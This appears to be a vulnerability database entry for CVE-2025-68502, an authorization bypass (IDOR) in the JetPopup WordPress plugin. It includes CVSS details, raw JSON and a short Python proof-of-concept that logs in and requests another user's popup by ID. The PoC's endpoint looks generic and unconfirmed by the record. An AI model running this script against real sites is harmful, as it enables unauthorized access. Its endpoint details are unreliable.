Security Vulnerability Report
中文
CVE-2025-68502 CVSS 4.3 MEDIUM

CVE-2025-68502

Published: 2025-12-29 22:15:43
Last Modified: 2026-04-23 15:35:56

Description

Authorization Bypass Through User-Controlled Key vulnerability in Crocoblock JetPopup jet-popup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetPopup: from n/a through <= 2.0.20.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

JetPopup <= 2.0.20.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68502 PoC - JetPopup IDOR Authorization Bypass # Requires authenticated WordPress account with subscriber+ privileges import requests import json target_url = "http://target-wordpress-site.com" username = "attacker" password = "password123" # Step 1: Authenticate and get session session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In' } session.post(login_url, data=login_data) # Step 2: Exploit IDOR by manipulating object reference # Replace VICTIM_ID with target object's ID vulnerable_endpoint = f"{target_url}/wp-json/jet-popup/v1/popup" exploit_data = { 'popup_id': 'VICTIM_POPUP_ID', # Manipulate this parameter 'action': 'get_popup_data' } response = session.get(vulnerable_endpoint, params=exploit_data) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # Step 3: Check if unauthorized access was successful if response.status_code == 200: data = response.json() if 'popup_data' in data: print("[+] IDOR Exploited Successfully - Unauthorized access gained!")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68502", "sourceIdentifier": "[email protected]", "published": "2025-12-29T22:15:42.877", "lastModified": "2026-04-23T15:35:55.730", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Crocoblock JetPopup jet-popup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetPopup: from n/a through <= 2.0.20.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jet-popup/vulnerability/wordpress-jetpopup-plugin-2-0-20-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}